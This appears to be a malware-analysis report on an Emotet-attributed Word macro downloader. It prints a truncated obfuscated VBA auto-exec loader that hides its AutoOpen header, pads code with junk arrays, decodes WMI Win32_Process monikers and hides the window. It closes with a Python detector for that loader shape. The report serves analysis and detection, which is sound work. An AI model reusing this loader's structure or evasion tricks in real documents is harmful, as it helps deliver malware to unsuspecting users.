Verdict: MALICIOUS (risk score 282)
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1140 Deobfuscate/Decode Files or Information
- T1204.002 User Execution: Malicious File
The sample carries a critical heuristic for an obfuscated auto-exec VBA loader. The recovered project declares an autoopen procedure whose header is split across three physical lines with VBA line continuations (Sub _ / autoopen( _ / )), which defeats naive one-line "Sub AutoOpen" pattern matching; every procedure is padded with large numeric junk arrays, and the strings that matter are rebuilt through a custom decoder (w03350) rather than appearing as literals. ClamAV attributes the file to Emotet (Doc.Downloader.Emotet-10001946-0), a known downloader family. The decoder's inputs concatenate, in source order, to the WMI monikers winmgmts:Win32_Processstartup and winmgmts:Win32_Process, and the macro sets ShowWindow on the startup object to 0 (written as 375290 - 375290, i.e. SW_HIDE). That is the standard preparation for launching a hidden child process through the Win32_Process object; the process-creation call and its command line fall past the truncated preview, so the second-stage command is not visible in this report. The Emotet signature and this loader shape are consistent with a remotely fetched payload, but no download URL is recoverable from the artifacts shown here.
Two of the lower-severity findings need reading with care. The legacy WordBasic marker finding states that no modern VBA project was recovered, which the carved macros.bas contradicts; treat it as redundant with the VBA findings rather than independent evidence. The single extracted URL is the OOXML DrawingML namespace URI that normal document markup carries, not a download or command-and-control indicator.
Heuristics (8)
- ClamAV: Doc.Downloader.Emotet-10001946-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
- VBA macros detected [medium, OLE_VBA_MACROS, 4 related findings]: Document contains VBA macro code
- Obfuscated auto-exec VBA loader [critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- GetObject call [high, OLE_VBA_GETOBJ]: GetObject call
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5853 bytes | e5db2fe59875a3d9ba8615cb392736b9f6e1bc9b58bd6b45419bad62bdff0add |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "n43486_"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "V1309_, 0, 0, MSForms, TextBox"
Attribute VB_Control = "j0595625, 1, 1, MSForms, TextBox"
Attribute VB_Name = "Y17505_"
Sub G25_3024()
Dim k86_0814()
ReDim k86_0814(22061)
k86_0814(21923) = 537 + Int(X454589) + l_340_54 + Int(712) + m_8_94 + h166446 + 443 + P2264_
k86_0814(21955) = 480 + Int(S72914) + b8662_5 + Int(774) + T_1466 + D_37953 + 317 + b36208_9
k86_0814(21925) = 377 + Int(G99682) + B17774 + Int(444) + u1497737 + D45828 + 230 + a21484
k86_0814(22033) = 343 + Int(i0064104) + b260__6 + Int(677) + W_54300 + i6304_04 + 613 + p050511
Dim K_17084()
ReDim K_17084(22061)
K_17084(21923) = 806 + Int(p3_50_3_) + c73311 + Int(704) + o806129 + j961406 + 316 + d0_625
K_17084(21955) = 53 + Int(A905946) + k_417749 + Int(457) + T99364 + J9216240 + 786 + k0677_06
K_17084(21925) = 252 + Int(R_7533) + u597237 + Int(922) + N8658940 + O80461 + 393 + H_10265
K_17084(22033) = 952 + Int(T1127_) + u49142_ + Int(360) + U229567 + t5_301 + 582 + N64404
End Sub
Sub _
autoopen( _
)
Dim O_1_1949()
ReDim O_1_1949(22061)
O_1_1949(21923) = 80 + Int(j1_72869) + S318_469 + Int(708) + j2424596 + l98264 + 645 + K79_1_51
O_1_1949(21955) = 984 + Int(Q542__) + p493197 + Int(455) + a10_012 + M20492 + 436 + Y727821
O_1_1949(21925) = 568 + Int(j256166) + T74_19 + Int(401) + w_17_4_0 + P903793_ + 797 + q4045937
O_1_1949(22033) = 113 + Int(o27541) + c32615 + Int(493) + I9979128 + c69332 + 981 + i2639818
k25542
Dim C597787()
ReDim C597787(87302)
C597787(87146) = 509 + Int(w981938_) + R1863_39 + Int(415) + I520_68 + d051413 + 39 + C4762149
C597787(87192) = 476 + Int(A22694) + o9_343 + Int(431) + F39338_ + u198830 + 328 + M778709_
C597787(87156) = 72 + Int(N86883) + m5352575 + Int(108) + T1875167 + b8_2574 + 310 + w9505125
C597787(87197) = 212 + Int(j947371) + K8_6383 + Int(296) + N2239770 + t14110_ + 595 + B33594
End Sub
Sub k25542()
Dim b4980791()
ReDim b4980791(87302)
b4980791(87146) = 102 + Int(j95921) + c3298579 + Int(917) + V_67410 + X086_446 + 359 + B19825
b4980791(87192) = 880 + Int(X655671) + D94685 + Int(657) + q511544 + K060301 + 245 + M_43344
b4980791(87156) = 831 + Int(V516917) + E120304 + Int(715) + U555257 + r82651 + 951 + v1246005
b4980791(87197) = 101 + Int(T_7246) + w0226588 + Int(946) + r4169251 + f836690 + 56 + u__909
Set d456__ = GetObject(w03350("winmg" + w03350("mts:Win32") + "_Processstartup"))
Dim n8040_53()
ReDim n8040_53(87302)
n8040_53(87146) = 460 + Int(a441098) + H_8515 + Int(276) + W0_520 + M14___82 + 392 + T754427
n8040_53(87192) = 554 + Int(q03001) + F263_689 + Int(376) + z3760_8_ + P741752 + 5 + w6648_
n8040_53(87156) = 170 + Int(h7947913) + z218197 + Int(218) + F694215 + q_9119 + 56 + l36307
n8040_53(87197) = 77 + Int(r5628140) + V3755066 + Int(239) + u1346000 + M21740 + 692 + i3832120
d456__. _
ShowWindow = 375290 - 375290
Dim p219465()
ReDim p219465(87302)
p219465(87146) = 656 + Int(S79454) + G5029626 + Int(769) + I3504_4 + D258_829 + 333 + q_266254
p219465(87192) = 826 + Int(K33_9_) + S209711 + Int(156) + R52807 + v526_7 + 833 + L5102209
p219465(87156) = 773 + Int(c66_33) + B6488914 + Int(350) + N_8198 + J44_18 + 100 + v249220
p219465(87197) = 404 + Int(R2206078) + U84_0458 + Int(573) + i3743652 + j_003169 + 45 + v8130409
Set k085719 = GetObject(w03350("winmg" + w03350("mts:Win32") + "_Process"))
Dim u6818672()
ReDim u6818672(87302)
u6818672(87146) = 673 + Int(z91505) + d22406 + Int(350) + f_40472 + d__496 + 402 + M1_987
u6818672(87192) = 350 + Int(W45113) + k_573_67 + Int(808) + M47_422 + s497638 + 499 + r850062
... (truncated)
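The obfuscated-loader heuristic above (auto-exec procedure, junk-array padding, decoder-wrapped strings reaching a GetObject sink) can be reproduced over the extracted VBA source. The script below is an added example written for this page; it is not the analyzer's detection code and not part of the sample. It embeds a constructed, trimmed copy of the preview's macro shape, folds VBA line continuations so the split Sub / autoopen( header is seen as one logical line, follows bare calls from the auto-exec procedure to the procedure holding the sinks, joins the quoted fragments passed to the decoder into the WMI monikers, and recognises ShowWindow = 375290 - 375290 as a hidden-window setting. Assumptions, stated in the code as well: the decoder w03350 is left undefined and is treated as a junk-stripping no-op over its literal arguments, and the 0.3 junk-ratio threshold is an arbitrary starting point.

```python
import re

# Constructed sample, not the carved macros.bas: a trimmed copy of the macro shape in
# the report preview. The decoder w03350 is deliberately undefined; the script never
# evaluates it and only reads the literal fragments passed to it.
SAMPLE_VBA = '''
Sub _
autoopen( _
)
Dim O_1_1949()
ReDim O_1_1949(22061)
O_1_1949(21923) = 80 + Int(j1_72869) + S318_469 + Int(708) + j2424596 + l98264 + 645 + K79_1_51
O_1_1949(21955) = 984 + Int(Q542__) + p493197 + Int(455) + a10_012 + M20492 + 436 + Y727821
k25542
End Sub
Sub k25542()
b4980791(87146) = 102 + Int(j95921) + c3298579 + Int(917) + V_67410 + X086_446 + 359 + B19825
b4980791(87192) = 880 + Int(X655671) + D94685 + Int(657) + q511544 + K060301 + 245 + M_43344
Set d456__ = GetObject(w03350("winmg" + w03350("mts:Win32") + "_Processstartup"))
d456__. _
ShowWindow = 375290 - 375290
Set k085719 = GetObject(w03350("winmg" + w03350("mts:Win32") + "_Process"))
End Sub
'''

AUTOEXEC = {"autoopen", "autoexec", "autoclose", "auto_open", "document_open", "workbook_open"}
SINKS = ("getobject", "createobject", "shell", "callbyname")
PROC_RE = re.compile(r"^(?:(?:Public|Private|Friend)\s+)?(?:Sub|Function)\s+(\w+)", re.I)
JUNK_RE = re.compile(r"^\w+\(\d+\)\s*=\s*\d+\s*\+\s*Int\(")   # numeric junk-array fill
STR_RE = re.compile(r'"([^"]*)"')
HIDE_RE = re.compile(r"showwindow\s*=\s*(\d+)\s*-\s*(\d+)")
JUNK_THRESHOLD = 0.3   # assumption: tune against a corpus of benign macros


def naive_grep_hits(src):
    # What a one-line "Sub AutoOpen" pattern sees when the header is split by " _".
    return re.search(r"\bSub\s+autoopen\b", src, re.I) is not None


def join_continuations(src):
    """Fold VBA line continuations (a trailing ' _') into logical lines."""
    lines, buf = [], ""
    for raw in src.splitlines():
        line = raw.rstrip()
        if line.endswith(" _"):
            buf += line[:-2] + " "
        else:
            lines.append((buf + line).strip())
            buf = ""
    return [l for l in lines + ([buf.strip()] if buf else []) if l]


def split_procedures(lines):
    """Map each Sub/Function name (lower-cased) to its body lines."""
    procs, cur = {}, None
    for line in lines:
        m = PROC_RE.match(line)
        if m:
            cur = m.group(1).lower()
            procs[cur] = []
        elif re.match(r"^End\s+(?:Sub|Function)\b", line, re.I):
            cur = None
        elif cur is not None:
            procs[cur].append(line)
    return procs


def reachable(procs, start):
    """Procedures reachable from start through bare calls (autoopen -> k25542)."""
    seen, stack = set(), [start]
    while stack:
        name = stack.pop()
        if name in seen or name not in procs:
            continue
        seen.add(name)
        for line in procs[name]:
            stack += [t.lower() for t in re.findall(r"[A-Za-z_]\w*", line) if t.lower() in procs]
    return seen


def analyze(src):
    procs = split_procedures(join_continuations(src))
    autoexec = sorted(p for p in procs if p in AUTOEXEC)
    body = [l for b in procs.values() for l in b]
    junk_ratio = sum(1 for l in body if JUNK_RE.match(l)) / len(body) if body else 0.0
    reach = set().union(*(reachable(procs, a) for a in autoexec))
    sinks, rebuilt, hidden = set(), set(), False
    for name in sorted(reach):
        for line in procs[name]:
            low = line.lower()
            for s in SINKS:
                if re.search(r"\b%s\s*\(" % s, low):
                    sinks.add((name, s))
                    # Join quoted fragments in source order, skipping the decoder calls.
                    # Assumption: the decoder only strips junk, so this is the plaintext.
                    rebuilt.add("".join(STR_RE.findall(line)))
            m = HIDE_RE.search(low)
            if m and int(m.group(1)) - int(m.group(2)) == 0:   # ShowWindow = 0 is SW_HIDE
                hidden = True
    return {
        "autoexec": autoexec,
        "junk_ratio": round(junk_ratio, 3),
        "sinks": sorted(sinks),
        "rebuilt_strings": sorted(s for s in rebuilt if s),
        "hidden_window": hidden,
        "obfuscated_autoexec_loader": bool(autoexec) and bool(sinks) and junk_ratio > JUNK_THRESHOLD,
    }
```

To run it against a real carve, pass the text of the olevba output (macros.bas here) to analyze(); the constructed SAMPLE_VBA only exists so the script runs offline. The point of naive_grep_hits is the contrast: it returns False on the sample, while analyze() reports autoopen, the two rebuilt winmgmts: monikers, the hidden-window setting and the GetObject sink reached from autoopen. A decoder that transforms its input (hex decode, char-array build) would not yield readable monikers from the fragments alone; in that case the sink and junk-ratio signals still fire and the rebuilt strings are a lead to confirm by emulating the decoder.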